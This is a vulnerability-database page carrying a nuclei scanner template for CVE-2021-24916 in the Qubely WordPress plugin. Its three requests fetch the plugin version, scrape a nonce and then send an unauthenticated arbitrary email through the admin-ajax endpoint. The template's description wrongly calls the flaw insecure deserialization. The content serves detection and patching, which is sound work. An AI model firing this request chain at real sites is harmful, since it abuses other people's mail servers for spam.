Lucene search
K

WordPress Qubely < 1.8.6 - Unauthenticated Email Sending

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

WordPress Qubely below 1.8.6 allows unauthenticated emails via qubely_send_form_data AJAX.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24916
7 Aug 202318:14
circl
CNNVD
WordPress plugin Qubely security vulnerability
7 Aug 202300:00
cnnvd
CVE
CVE-2021-24916
7 Aug 202314:31
cve
Cvelist
CVE-2021-24916 Qubely < 1.8.6 - Unauthenticated Arbitrary E-mail Sending
7 Aug 202314:31
cvelist
EUVD
EUVD-2021-11828
7 Oct 202500:30
euvd
NVD
CVE-2021-24916
7 Aug 202315:15
nvd
OSV
CVE-2021-24916
7 Aug 202315:15
osv
Patchstack
WordPress Qubely – Advanced Gutenberg Blocks Plugin < 1.8.6 is vulnerable to Broken Access Control
8 Aug 202300:00
patchstack
Prion
Design/Logic Flaw
7 Aug 202315:15
prion
Positive Technologies
PT-2023-12071
7 Aug 202300:00
ptsecurity
Rows per page
id: CVE-2021-24916

info:
  name: WordPress Qubely < 1.8.6 - Unauthenticated Email Sending
  author: roberto
  severity: high
  description: |
   Qubely WordPress plugin < 1.8.6 contains an insecure deserialization caused by unauthenticated users being able to send arbitrary emails via the qubely_send_form_data AJAX action, letting attackers send spam or malicious emails, exploit requires no authentication.
  impact: |
   Attackers can send spam or malicious emails from the server, potentially leading to spam blacklisting or abuse.
  remediation: |
   Update to version 1.8.6 or later
  reference:
    - https://wpscan.com/vulnerability/93b893be-59ad-4500-8edb-9fa7a45304d5/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24916
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-24916
    epss-score: 0.01535
    epss-percentile: 0.71795
    cwe-id: CWE-284
  metadata:
    max-request: 3
    verified: true
    vendor: themeum
    product: qubely
    fofa-query: body="qubely_urls"
    publicwww-query: "/wp-content/plugins/qubely/"
  tags: cve,cve2021,wordpress,wp-plugin,qubely,wp,email,unauth

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/qubely/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Qubely")'
          - 'compare_versions(version, "< 1.8.6")'
        internal: true
        condition: and

    extractors:
      - type: regex
        name: version
        internal: true
        group: 1
        regex:
          - '(?m)Stable tag:\s*([\d.]+)'

  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "qubely_urls", "\"nonce\"")'
        internal: true
        condition: and

    extractors:
      - type: regex
        name: nonce
        internal: true
        group: 1
        regex:
          - '"nonce":"([a-f0-9]+)"'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=qubely_send_form_data&[email protected]&email-subject=CVE-2021-24916+Test&email-body=test&field-error-message=err&form-success-message=qubely49fc16d8&form-error-message=qubely49fc16d8&qubely-form-input[name]=test&security={{nonce}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"success\":true", "qubely49fc16d8")'
        condition: and
# digest: 490a00463044022040e56c4797a7d878fca5c51db2508d9e5d0e3a3f6373d6751a4faade7f01f2a802207beda317d7e70640ac25e4dfd9d85e534fba0e1f02c6eb9e2bf408ff47f9d271:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 May 2026 01:43Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.01535
SSVC
10